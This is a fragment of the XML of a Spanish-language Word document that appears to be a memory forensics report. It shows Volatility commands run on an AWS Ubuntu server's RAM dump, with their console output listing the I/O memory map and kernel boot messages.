      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E02F04" w14:textId="45830771" w:rsidR="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E740A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_iomem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7867F2" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRPr="00C9562B" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38914B" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRPr="00520AAC" w:rsidRDefault="00E740A3" w:rsidP="00E740A3"/>
    <w:p w14:paraId="482AD70B" w14:textId="2E52632E" w:rsidR="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="00E740A3">
      <w:r w:rsidRPr="00E740A3">
        <w:t>La respuesta de la consola ha sido la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8890F2" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="00E740A3"/>
    <w:p w14:paraId="482D667C" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRPr="00C9562B" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6AFEB"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A57C1CE"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Reserved                0x0           0xFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2EA5B"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System RAM              0x1000        0x9DFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D57BD4"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Reserved                0x9E000       0x9FFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC3488"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PCI Bus 0000:00         0xA0000       0xBFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077807F2"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Video ROM               0xC0000       0xC8BFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D58DC8"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Reserved                0xE0000       0xFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACF457"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 xml:space="preserve">  System ROM            0xF0000       0xFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726A0C6"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System RAM              0x100000      0x3FFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF28672"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 xml:space="preserve">  Kernel code           0x31C00000    0x328031D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CBE4C"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 xml:space="preserve">  Kernel data           0x328031D1    0x33055EBF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD3F40"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 xml:space="preserve">  Kernel bss            0x332C5000    0x33516FFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12306BB2"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PCI Bus 0000:00         0xF0000000    0xFBFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A03F4A"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 xml:space="preserve">  0000:00:02.0          0xF0000000    0xF1FFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA8D97E"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 xml:space="preserve">  0000:00:03.0          0xF2000000    0xF2FFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC87EB"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 xml:space="preserve">    xen-platform-pci    0xF2000000    0xF2FFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E737B5"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 xml:space="preserve">  0000:00:02.0          0xF3000000    0xF3000FFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465105D4"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Reserved                0xFC000000    0xFFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D595F26"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 xml:space="preserve">  IOAPIC 0              0xFEC00000    0xFEC003FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3F312"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 xml:space="preserve">  HPET 0                0xFED00000    0xFED003FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0D135" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRPr="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E740A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    PNP0103:00          0xFED00000    0xFED003FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18130E9E" w14:textId="77777777" w:rsidR="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E740A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  Local APIC            0xFEE00000    0xFEE00FFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD81703" w14:textId="641695ED" w:rsidR="00E740A3" w:rsidRPr="00E740A3" w:rsidRDefault="00E740A3" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00E740A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853C09B" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="2000CEFB" w14:textId="51829DBB" w:rsidR="00E740A3" w:rsidRDefault="00E740A3">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B788EA6" w14:textId="2CA8C059" w:rsidR="006A2A95" w:rsidRDefault="00182D42" w:rsidP="006A2A95">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Ref155654417"/>
      <w:bookmarkStart w:id="188" w:name="_Toc155782536"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC">
        <w:t xml:space="preserve">II. </w:t>
      </w:r>
      <w:r w:rsidR="006A2A95">
        <w:t>Comando linux_demsg.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="4B053120" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95"/>
    <w:p w14:paraId="213A62A8" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E78C30" w14:textId="690C27A7" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_dmesg &gt; /home/jrodg85/informe-linux_dmesg.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA0060" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED5524" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00520AAC" w:rsidRDefault="006A2A95" w:rsidP="006A2A95"/>
    <w:p w14:paraId="00E81FFF" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:r w:rsidRPr="00E740A3">
        <w:t>La respuesta de la consola ha sido la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64202BE9" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95"/>
    <w:p w14:paraId="2491FF3A" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6270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Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34672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Command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-1021-aws root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 nvme.io_timeout=4294967295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66FA3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KERNEL supported cpus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789929B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Intel GenuineIntel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1BA8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AMD AuthenticAMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE9D3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Centaur CentaurHauls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3548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x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF76D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x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE28C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x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F805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x86/fpu: xstate_offset[2]:  576, xstate_sizes[2]:  256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB2A7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x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A405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e820: BIOS-provided physical RAM map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F46EA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BIOS-e820: [mem 0x0000000000000000-0x000000000009dfff] usable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A44E27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BIOS-e820: [mem 0x000000000009e000-0x000000000009ffff] reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0D01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BIOS-e820: [mem 0x00000000000e0000-0x00000000000fffff] reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CBD0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BIOS-e820: [mem 0x0000000000100000-0x000000003fffffff] usable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D97B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BIOS-e820: [mem 0x00000000fc000000-0x00000000ffffffff] reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3992AC0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NX (Execute Disable) protection: active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDC93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SMBIOS 2.7 present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DA39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DMI: Xen HVM domU, BIOS 4.2.amazon 08/24/2006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FAAD4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Hypervisor detected: Xen HVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7590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Xen version 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80787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Xen Platform PCI: I/O protocol version 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9ACCF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Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6084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Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30678E5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You might have to change the root device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD5D1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from /dev/hd[a-d] to /dev/xvd[a-d]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478933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in your root= kernel command line option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3B13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HVMOP_pagetable_dying not supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A272D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e820: update [mem 0x00000000-0x00000fff] usable ==&gt; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C25C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e820: remove [mem 0x000a0000-0x000fffff] usable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2196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e820: last_pfn = 0x40000 max_arch_pfn = 0x400000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4B97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lastRenderedPageBreak/>
        <w:t>[0.0] MTRR default type: write-back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CD80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MTRR fixed ranges enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78B32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00000-9FFFF write-back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CB52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A0000-BFFFF write-combining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E93E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C0000-FFFFF write-back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCCC9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MTRR variable ranges enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3902E97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0 base 0000F0000000 mask 3FFFF8000000 uncachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC293A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1 base 0000F8000000 mask 3FFFFC000000 uncachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7545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2 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AA1C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3 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD6740"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4 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036EC3D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5 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5AD9E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6 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7767515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7 disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8FE5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x86/PAT: Configuration [0-7]: WB  WC  UC- UC  WB  WP  UC- WT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B32AAE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found SMP MP-table at [mem 0x000fbc50-0x000fbc5f] mapped at [        (ptrval)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3EC9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Scanning 1 areas for low memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A29047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Base memory trampoline at [        (ptrval)] 98000 size 24576</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C793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BRK [0x33518000, 0x33518fff] PGTABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2C06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BRK [0x33519000, 0x33519fff] PGTABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBA9D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BRK [0x3351a000, 0x3351afff] PGTABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0BF4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BRK [0x3351b000, 0x3351bfff] PGTABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6FCF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RAMDISK: [mem 0x359e1000-0x36ce7fff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454307A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ACPI: Early table checksum verification disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788F7D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ACPI: RSDP 0x00000000000EA020 000024 (v02 Xen   )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C97F39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ACPI: XSDT 0x00000000FC00E2A0 000054 (v01 Xen    HVM      00000000 HVML 00000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6848C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ACPI: FACP 0x00000000FC00DF60 0000F4 (v04 Xen    HVM      00000000 HVML 00000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC2C1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ACPI: DSDT 0x00000000FC0021C0 00BD19 (v02 Xen    HVM      00000000 INTL 20090123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3701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ACPI: FACS 0x00000000FC002180 000040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E206CD0"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ACPI: FACS 0x00000000FC002180 000040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB397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ACPI: APIC 0x00000000FC00E060 0000D8 (v02 Xen    HVM      00000000 HVML 00000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD82BC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ACPI: HPET 0x00000000FC00E1B0 000038 (v01 Xen    HVM      00000000 HVML 00000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15195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ACPI: WAET 0x00000000FC00E1F0 000028 (v01 Xen    HVM      00000000 HVML 00000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079C51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ACPI: SSDT 0x00000000FC00E220 000031 (v02 Xen    HVM      00000000 INTL 20090123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8BF7D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ACPI: SSDT 0x00000000FC00E260 000031 (v02 Xen    HVM      00000000 INTL 20090123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF310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ACPI: Local APIC address 0xfee00000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F85EB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No NUMA configuration found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28565A6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Faking a node at [mem 0x0000000000000000-0x000000003fffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7565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NODE_DATA(0) allocated [mem 0x3ffd5000-0x3fffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719476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tsc: Fast TSC calibration using PIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD488B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Zone ranges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078EAA7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DMA      [mem 0x0000000000001000-0x0000000000ffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DFE4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DMA32    [mem 0x0000000001000000-0x000000003fffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80D75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Normal   empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1ED8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Device   empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F918A5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lastRenderedPageBreak/>
        <w:t>[0.0] Movable zone start for each node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74031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Early memory node ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A77600"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node   0: [mem 0x0000000000001000-0x000000000009dfff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166C66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node   0: [mem 0x0000000000100000-0x000000003fffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED52BA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Initmem setup node 0 [mem 0x0000000000001000-0x000000003fffffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9DE7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On node 0 totalpages: 262045</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8923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DMA zone: 64 pages used for memmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DFBA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DMA zone: 21 pages reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D28C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DMA zone: 3997 pages, LIFO batch:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F29A6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DMA32 zone: 4032 pages used for memmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1A7D7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DMA32 zone: 258048 pages, LIFO batch:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D325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Reserved but unavailable: 99 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890750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ACPI: PM-Timer IO Port: 0xb008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6E72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ACPI: Local APIC address 0xfee00000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3DEFC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IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24526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ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879FA6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ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87479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ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D211F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ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009289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ACPI: IRQ0 used by override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66471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ACPI: IRQ5 used by override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C17C2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ACPI: IRQ9 used by override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5566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ACPI: IRQ10 used by override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290DD6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ACPI: IRQ11 used by override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B6BE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Using ACPI (MADT) for SMP configuration information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B827F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ACPI: HPET id: 0x8086a201 base: 0xfed00000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1B92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smpboot: Allowing 15 CPUs, 14 hotplug CPUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88A3C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PM: Registered nosave memory: [mem 0x00000000-0x00000fff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B009D6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PM: Registered nosave memory: [mem 0x0009e000-0x0009ffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A35F8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PM: Registered nosave memory: [mem 0x000a0000-0x000dffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039448C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PM: Registered nosave memory: [mem 0x000e0000-0x000fffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8135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e820: [mem 0x40000000-0xfbffffff] available for PCI devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CADAC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Booting paravirtualized kernel on Xen HVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37ECE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clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B87D68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random: get_random_bytes called from start_kernel+0x99/0x4fd with crng_init=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E8C0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setup_percpu: NR_CPUS:8192 nr_cpumask_bits:15 nr_cpu_ids:15 nr_node_ids:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EDA3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percpu: Embedded 46 pages/cpu @        (ptrval) s151552 r8192 d28672 u262144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256122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pcpu-alloc: s151552 r8192 d28672 u262144 alloc=1*2097152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B030F0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pcpu-alloc: [0] 00 01 02 03 04 05 06 07 [0] 08 09 10 11 12 13 14 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6537F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xen: PV spinlocks enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69220D0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PV qspinlock hash table entries: 256 (order: 0, 4096 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B764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Built 1 zonelists, mobility grouping on.  Total pages: 257928</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5515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Policy zone: DMA32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F593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Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-1021-aws root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 nvme.io_timeout=4294967295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F6E0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lastRenderedPageBreak/>
        <w:t>[0.0] Calgary: detecting Calgary via BIOS EBDA area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699DC110"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Calgary: Unable to locate Rio Grande table in EBDA - bailing!</w:t>
      </w:r>
    </w:p>
